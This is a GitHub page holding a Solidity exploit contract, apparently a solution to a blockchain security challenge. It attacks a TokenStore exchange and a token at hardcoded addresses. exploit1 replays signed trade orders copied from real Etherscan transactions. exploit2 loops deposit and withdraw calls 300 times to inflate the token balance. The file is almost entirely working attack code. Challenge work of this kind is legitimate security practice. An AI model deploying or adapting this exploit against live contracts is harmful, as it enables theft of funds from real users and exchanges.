-
Notifications
You must be signed in to change notification settings - Fork 74
/
Exploit.sol
96 lines (85 loc) · 3.83 KB
/
Exploit.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.20;
import {Challenge} from "./challenge/Challenge.sol";
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
contract Exploit {
Challenge challenge;
ITokenStore tokenStore;
IToken token;
constructor(address challengeAddr) {
challenge = Challenge(challengeAddr);
tokenStore = ITokenStore(0x1cE7AE555139c5EF5A57CC8d814a867ee6Ee33D8);
token = IToken(0xC937f5027D47250Fa2Df8CbF21F6F88E98817845);
}
function exploit1() public payable {
// https://etherscan.io/tx/0x6d727f761c7744bebf4a8773f5a06cd7af280dcda0b55c0995aea47d5570f1a1
{
address tokenGet = 0x0000000000000000000000000000000000000000;
uint256 amountGet = 42468000000000000;
address tokenGive = 0xC937f5027D47250Fa2Df8CbF21F6F88E98817845;
uint256 amountGive = 1000000000000;
uint256 expires = 109997981;
uint256 nonce = 249363390;
address user = 0x6FFacaa9A9c6f8e7CD7D1C6830f9bc2a146cF10C;
uint8 v = 28;
bytes32 r = 0x2b80ada8a8d94ed393723df8d1b802e1f05e623830cf117e326b30b1780ae397;
bytes32 s = 0x65397616af0ec4d25f828b25497c697c58b3dcc852259eaf7c72ff487ce76e1e;
uint256 amount = 4246800000000000;
tokenStore.deposit{value: 1 ether}();
tokenStore.trade(tokenGet, amountGet, tokenGive, amountGive, expires, nonce, user, v, r, s, amount);
tokenStore.withdrawToken(tokenGive, amountGive * amount / amountGet);
}
// https://etherscan.io/tx/0x1483f5c6158dfb9a899b137ccfa988fb2b1f6927854dcd83e0a29caadd0e38ba
{
address tokenGet = 0x0000000000000000000000000000000000000000;
uint256 amountGet = 84000000000000000;
address tokenGive = 0xC937f5027D47250Fa2Df8CbF21F6F88E98817845;
uint256 amountGive = 200000000000;
uint256 expires = 108142282;
uint256 nonce = 470903382;
address user = 0xa219Fb3CfAE449F6b5157c1200652cc13e9c9EA8;
uint8 v = 28;
bytes32 r = 0xf164a3e185694dadeb11a9e9e7371929675d2eb2a6e9daa4508e96bc81741018;
bytes32 s = 0x314f3b6d5ce7c3f396604e87373fe4fe0a10bef597287d840b942e57595cb29a;
uint256 amount = 4200000000000000;
tokenStore.deposit{value: 1 ether}();
tokenStore.trade(tokenGet, amountGet, tokenGive, amountGive, expires, nonce, user, v, r, s, amount);
tokenStore.withdrawToken(tokenGive, amountGive * amount / amountGet);
}
token.approve(address(tokenStore), type(uint256).max);
}
function exploit2() public {
for (uint256 i = 0; i < 300; i++) {
uint256 amount = token.balanceOf(address(this));
tokenStore.depositToken(address(token), amount);
tokenStore.withdrawToken(address(token), amount);
}
}
}
interface ITokenStore {
function successor() external view returns (address);
function deprecated() external view returns (bool);
function depositToken(address _token, uint256 _amount) external;
function withdrawToken(address _token, uint256 _amount) external;
function deposit() external payable;
function withdraw(uint256 _amount) external payable;
function trade(
address _tokenGet,
uint256 _amountGet,
address _tokenGive,
uint256 _amountGive,
uint256 _expires,
uint256 _nonce,
address _user,
uint8 _v,
bytes32 _r,
bytes32 _s,
uint256 _amount
) external;
}
interface IToken is IERC20 {
function databaseAddress() external view returns (address);
function depositsAddress() external view returns (address);
function forkAddress() external view returns (address);
function libAddress() external view returns (address);
}